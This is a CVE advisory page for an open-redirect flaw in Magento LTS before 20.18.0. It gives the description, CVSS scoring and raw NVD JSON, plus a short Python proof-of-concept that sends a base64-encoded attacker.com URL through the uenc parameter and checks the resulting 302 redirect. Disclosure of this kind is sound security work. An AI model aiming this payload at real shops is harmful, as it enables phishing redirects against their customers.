Security Vulnerability Report
中文
CVE-2026-42207 CVSS 6.1 MEDIUM

CVE-2026-42207

Published: 2026-05-15 17:16:47
Last Modified: 2026-05-15 19:16:58
Source: [email protected]

Description

Magento Long Term Support (LTS) is an unofficial, community-driven project provides an alternative to the Magento Community Edition e-commerce platform with a high level of backward compatibility. Prior to 20.18.0, Mage_ProductAlert_AddController::stockAction() reads the uenc query parameter and passes it directly to $this->_redirectUrl($backUrl) without calling $this->_isUrlInternal(). When the supplied product_id does not match any catalog product, the server issues an unvalidated HTTP 302 redirect to whatever URL was provided as uenc. This vulnerability is fixed in 20.18.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Magento Long Term Support (LTS) < 20.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Magento LTS Open Redirect # Date: 2026-05-15 # Exploit Author: Analyst # Vendor Homepage: https://github.com/OpenMage/magento-lts # Version: < 20.18.0 def check_poc(target_domain): # Base64 encoded version of https://attacker.com # aHR0cHM6Ly9hdHRhY2tlci5jb20= # Magento uenc format often includes padding or specific structure, simplified here for PoC malicious_redirect = "aHR0cHM6Ly9hdHRhY2tlci5jb20=" # Use a non-existent product ID to trigger the error path url = f"{target_domain}/productalert/add/stock/product_id/99999999/uenc/{malicious_redirect}/" try: response = requests.get(url, allow_redirects=False) if response.status_code == 302: location = response.headers.get('Location') if location and "attacker.com" in location: print(f"[+] Vulnerable! Redirecting to: {location}") return True print("[-] Not vulnerable or PoC failed.") return False except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": target = "http://127.0.0.1/magento" check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42207", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:46.757", "lastModified": "2026-05-15T19:16:58.243", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Magento Long Term Support (LTS) is an unofficial, community-driven project provides an alternative to the Magento Community Edition e-commerce platform with a high level of backward compatibility. Prior to 20.18.0, Mage_ProductAlert_AddController::stockAction() reads the uenc query parameter and passes it directly to $this->_redirectUrl($backUrl) without calling $this->_isUrlInternal(). When the supplied product_id does not match any catalog product, the server issues an unvalidated HTTP 302 redirect to whatever URL was provided as uenc. This vulnerability is fixed in 20.18.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8", "source": "[email protected]"}, {"url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.